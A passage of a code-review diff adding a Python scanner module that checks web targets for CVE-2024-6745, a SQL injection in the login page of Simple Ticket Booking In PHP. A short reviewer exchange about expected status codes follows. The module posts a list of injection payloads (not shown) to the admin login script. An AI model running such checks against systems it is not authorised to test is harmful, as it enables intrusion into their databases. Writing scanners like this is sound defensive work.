agent/exploits/cve_2024_6745.py

```diff
@@ -0,0 +1,119 @@
+
+    Args:
+        target (definitions.Target): The target to create the vulnerability for.
+
+    Returns:
+        definitions.Vulnerability: The created vulnerability object.
+    """
+    entry = kb.Entry(
+        title=VULNERABILITY_TITLE,
+        risk_rating="HIGH",
+        short_description=VULNERABILITY_DESCRIPTION,
+        description=VULNERABILITY_DESCRIPTION,
+        references={
+            "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}"
+        },
+        recommendation=(
+            "Implement proper input validation and parameterized queries to mitigate SQL injection attacks. "
+            "Update the 'adminauthenticate.php' script to handle user inputs securely."
+        ),
+        security_issue=True,
+        privacy_issue=False,
+        has_public_exploit=False,
+        targeted_by_malware=False,
+        targeted_by_ransomware=False,
+        targeted_by_nation_state=False,
+    )
+    technical_detail = f"{target.origin}/adminauthenticate.php is vulnerable to {VULNERABILITY_REFERENCE}, {VULNERABILITY_TITLE}"
+    vulnerability = definitions.Vulnerability(
+        entry=entry,
+        technical_detail=technical_detail,
+        risk_rating=agent_report_vulnerability_mixin.RiskRating.HIGH,
+    )
+    return vulnerability
+
+
+@exploits_registry.register
+class SimpleTicketBookingSQLInjectionExploit(definitions.Exploit):
+    """
+    CVE-2024-6745: SQL Injection in Simple Ticket Booking In PHP.
+    """
+
+    def accept(self, target: definitions.Target) -> bool:
+        """
+        Checks if the target is vulnerable to SQL Injection in Simple Ticket Booking In PHP.
+
+        Args:
+            target (definitions.Target): The target to check vulnerability for.
+
+        Returns:
+            bool: True if vulnerable, False otherwise.
+        """
+        try:
+            response = requests.post(
+                f"{target.origin}/adminauthenticate.php", timeout=DEFAULT_TIMEOUT
+            )
+            if (
+                response.status_code == 200
+                and "action ='adminauthenticate.php'" in response.text
+            ):
+                return True
+            return False
+        except requests.RequestException:
+            return False
+
+    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+        """
+        Checks for SQL Injection vulnerability in Simple Ticket Booking.
+        """
+        vulnerabilities = []
+
+        for payload in PAYLOADS:
+            try:
+                response = requests.post(
+                    f"{target.origin}/adminauthenticate.php",
+                    data=payload,
+                    timeout=DEFAULT_TIMEOUT,
+                )
+                if (
+                    response.status_code == 200
+                    and "action ='adminauthenticate.php'" in response.text
+                ):
```

Comment:
the same code for check and accept ? isn't this suppose to be 302 code

Reply:
yes but in the final page there should be a 200 OK and `action ='adminauthenticate.php'` in the response.